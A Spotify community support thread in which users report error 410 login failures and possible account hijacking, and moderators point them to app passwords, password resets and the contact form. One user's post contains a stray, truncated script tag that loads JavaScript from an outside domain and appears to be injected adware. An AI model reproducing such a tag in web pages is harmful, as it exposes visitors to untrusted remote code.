Announcements
The Spotify Stars Program: Celebrating Values Week!

Help Wizard

Step 1

NEXT STEP

Error Code: 410

Solved!

Error Code: 410

Hello,

As of yesterday I can't log in to my Spotify account using my Spotify account details.

The interface appears but I get a 410 error code forcing me in offline mode, also saying that my username or password is wrong. 

I've tried to reset the password, but I'm not getting the mail, maybe I've been hacked?

317 Replies

Peter/Robbie

Authenticating with Robbie's account worked.

I think that I know what the problem could be.

I'm using 2 factor authentication with Facebook and I'm not getting the prompt to enter code submitted via text message.

Let me quickly disable that and try with my account again.

That sounds possible! (and why you get that not available to login offline message). 

Fingers crossed!

Peter

Peter
Spotify Community Mentor and Troubleshooter

Spotify Last.FM Twitter LinkedIn Meet Peter Rock Star Jam 2014

If this post was helpful, please add kudos below!

Guys I can mark this as solved!

For those making use of 2 factor authentication for Facebook you will need to generate an application specific password and use that password for authentication.

SETTINGS > ACCOUNT SETTINGS > SECURITY > APP PASSWORDS

Thanks for your help!

Dear all,

I have the same problem! when I log in it appears the following message "The username os password is incorrect. please check that your user details are correct: log out in to Spotify again. (error code 410). My session is offline an I can't listen my play list. I log in using my user name "mcentellas" (no facebook). I just created a new account to write a message to the community. PLease, could you give me an answer? Many thanks in advance!

MARC

Hi there! Your account is fine on our end. Have you tried doing a password reset? Be sure to enter your 'mcentellas' username into the field.

Thanks for your quick reply.

I attach a screenshot of the error 410 when using my mcentellas username (not marccentellas which is the account just created to contact you). I do not receive any email with the new password when I request it.

Thanks again!

spotify.jpg

Hi marccentellas - There are two different email addresses for those two accounts--are you sure you're checking the one linked to 'mcentellas'. 

Your accout is healthy on this end so that password reset should be reaching you. 

If not, please use our contact form so we can send you a direct link. 

Marked as solution

I am having the same problem on my account "sremier". 

Hi srmier2k - You've made two accounts with us with two different usernames. We can help sort this out--just head over to our contact form

Marked as solution

Account has been regained ! "sremier" it was hijacked, and i got help from the spotify support! thanks

Awesome! Glad to hear it 🙂

I am also having this problem... i had to create a new spotify account just to post this. i can log in but offline. i try to log in threw facebook but it says i dont have an account, yet when i try to make a new one with my face book it says i still have one? please inbox me for help.

@austin11411 wrote:

I am also having this problem... i had to create a new spotify account just to post this. i can log in but offline. i try to log in threw facebook but it says i dont have an account, yet when i try to make a new one with my face book it says i still have one? please inbox me for help.

Hey! Welcome to the community 🙂

I would suggest you get in touch with the customer services team directly using the online contact form since they are the ones who deal with account issues 😉 

If you get an automated email reply back directing you to the community or help pages, you need to reply directly to that email (even if its from no-reply) and one of the customer services agents will get back to you as soon as possible.

Peter

Peter

Hi, Meredith, I've tried that, it doesn't work

@Mr_Guy wrote:

Hi, Meredith, I've tried that, it doesn't work

I've just replied to your other post over here.

--------------------------------------------------------------

For common support questions, see support.spotify.com.
To judge my musical taste, check out my last.fm.

I'm having the same issue, I've tried the customer service, but it didn't help. Please 

@user-removed wrote:

I'm having the same issue, I've tried the customer service, but it didn't help. Please 

Lets continue troubleshooting on your other topic here to keep things in one place. 

Can you post your case number from when you got in touch (its in the automated email reply you get when you submit a form) and I will ask someone to put a chase on it for you. 

Peter

Peter

Hi,

Im also having this problem. Neither android, web or pc spotify works.

Tried resetting my password...no e-mail. Checked spam, thrash and other folders.

This is several days ago. I have sent you a error report through the payment team contact form a couple days ago.

In fear of being hacked I asked for an answer to my other e-mail.

My username is e0300752

The weird thing is that I can get in with facebook but spotify treats it as a free account. Which means none of my playlists are there.

My e0300752 account is again premium.  So it is Weird that FB-> Free (no playlists) e0300752->Premium (can not get in)

Please reply me either here or by e-mail to the secondary address I gave in my report ticket.

Thanks

<script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={970C0B75-7AEB-45DD-BA8B-86D64B1932A5}&d=2013-6-7&...

Hi e0300752 - Hi there! Sounds like you've made two separate accounts here. 

Please try entering just your 'e0300752' username when requesting that email. When you go to sign in, use that username and your new password. You should find both your Premium and your playlists are waiting for you. 

Hi,

Im also having this problem. 

Tried resetting my password, but there is a message telling me my username doesn't exist, but yesterday I was using normal.

In fear of being hacked.

My username is: curcz

I get premium account this week.

Please reply me here.

Thanks

Suggested posts